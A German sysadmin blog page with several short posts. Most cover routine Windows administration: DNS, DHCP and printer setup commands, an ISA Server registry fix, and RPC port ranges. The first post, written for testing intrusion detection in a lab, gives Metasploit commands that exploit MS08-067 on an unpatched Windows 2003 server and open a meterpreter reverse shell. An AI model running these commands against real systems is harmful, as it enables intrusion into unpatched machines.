.:Ewig Drohendes Versagen:.

Um die Intrusion Detection unseres Netzwerkes zu testen, habe ich ein wenig mit Kali / Metasploit herum experimentiert.

Als Ziel habe ich einen ungepatchten Windows 2003 R2 Server (deutsch) auf einem ESXi verwendet.

Als Angreifer kam ein Kali 2.0 ebenfalls auf einem ESXi zum Einsatz.

Als Exploit bietet sich hier immer der MS08_067 an, da dieser in der Regel relativ zuverlässig „zündet“.

Jedoch leider nicht auf meinem Deutschen Server – hierfür ist ggf. die dedizierte Angabe des Targets nötig.


msfconsole -q
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST Ziel.IP
set LHOST Quell.IP
set target 66
exploit

Ohne die Angabe des Target stürzt der Server Dienst am Ziel immer „nur“ ab – jedoch wird der Payload nicht ausgeführt.

Mit Show Targets kann man sich alle Möglichkeiten anzeigen lassen – wobei hier das NX oder NO NX glaube ich eine entscheidende Rolle spielt 🙂

… zumindest ein bisschen 🙂

1. DNS record anlegen:
dnscmd DNSSERVER.contoso.com /recordadd contoso.com CON-DRU010 A 192.168.0.10

oder

Powershell:
1. DNS record anlegen:
Add-DnsServerResourceRecordA -Name „CON-DRU010“ -ZoneName „contoso.com“ -IPv4Address „192.168.0.10“

2. DHCP Reservierung
Add-DhcpServerv4Reservation -ScopeId 192.168.0.0 -IPAddress 192.168.0.10 -ClientId 00C0EE13AFFE -Name ‚CON-DRU010.contoso.com‘

3. Druckerport anlegen
Add-PrinterPort -Name CON-DRU010.contoso.com -PrinterHostAddress CON-DRU010.contoso.com -SNMP „1“ -SNMPCommunity „public“

4. Drucker anlegen
Add-Printer -Name „Drucke_mal_mit_Ruebezahl“ -DriverName „Microsoft XPS Document Writer v4“ -PortName „CON-DRU010.contoso.com“

Mal wieder ein Post zum ISA Server – ja auch die soll es noch geben ^^

Aus mir bisher noch unerklärlichen Gründen hatten wir eine ISA Firewall Regel bei der sowohl die Protokolle als auch die Quell- und Zielnetze fehlten.

Dadurch ließ sich das Regelwerk nicht mehr neu anwenden – was jetzt nicht ganz so doll ist …

Im isaserver.org Forum bin ich dann aber auf eine Lösung des Problems gestoßen.

Da es sich bei der betroffenen Installation nur einen Standard Server handelte (SE) habe ich einfach den Registry Zweig:

HKEY_LOCAL_MACHINE\IsaStg_Eff1Policy\PolicyRules\

nach der entsprechenden „Bezeichnung“ der Regel durchsucht und dann den gesamten Schlüssel gelöscht (vorher zur Sicherheit nen Export).

Dann flugs die ISA Server-Speicher Dienst durch gestartet – ACHTUNG – der startet auch fast alle anderen ISA Dienste neu – und siehe da – die böse Firewall Regel ist weg *HAPPY*

Da ich es grad mal wieder gesucht habe – Blog ich es hier mal eben.

Wenn man via ADUC einen neuen Benutzer anlegt, so wird per default als Anzeigename VORNAME NACHNAME verwendet.

Da ist an der einen oder anderen Stelle etwas unschön – wenn man nicht grad von seinen 300 Kollegen die Vornamen im Kopf hat.

Folgendes Vorgehen für einen deutschsprachigen Windows Server 2008 R2.
(mehr …)

Da wir in meiner aktuellen Umgebung keine Firewall im Einsatz haben, welche mit den dynamischen RPC Ports (RPC Filter) umgehen kann,
wollten wir im Zuge der Umstrukturierung unsere Firewallregeln für die Außenstellen auch die von RPC verwendeten Ports ein wenig eingrenzen.

Hierzu sollte man noch wissen, dass sich die Standard Ports ab Windows 2008 geändert haben.

Standard für Windows Server 2003 sind die Ports 1024-5000 für TCP und UDP.
Ab Windows Server 2008 wurde die Port-Range auf 49152-65535 für TCP und UDP verändert.

Die aktuellen Werte kann man sich seperat für IPV4/6 und TCP/UDP mit folgendem Befehl anzeigen lassen
(mehr …)

Hier mal eine Linksammlung zu dem Thema:

administrator.de
kevintaber.com
marosnet.com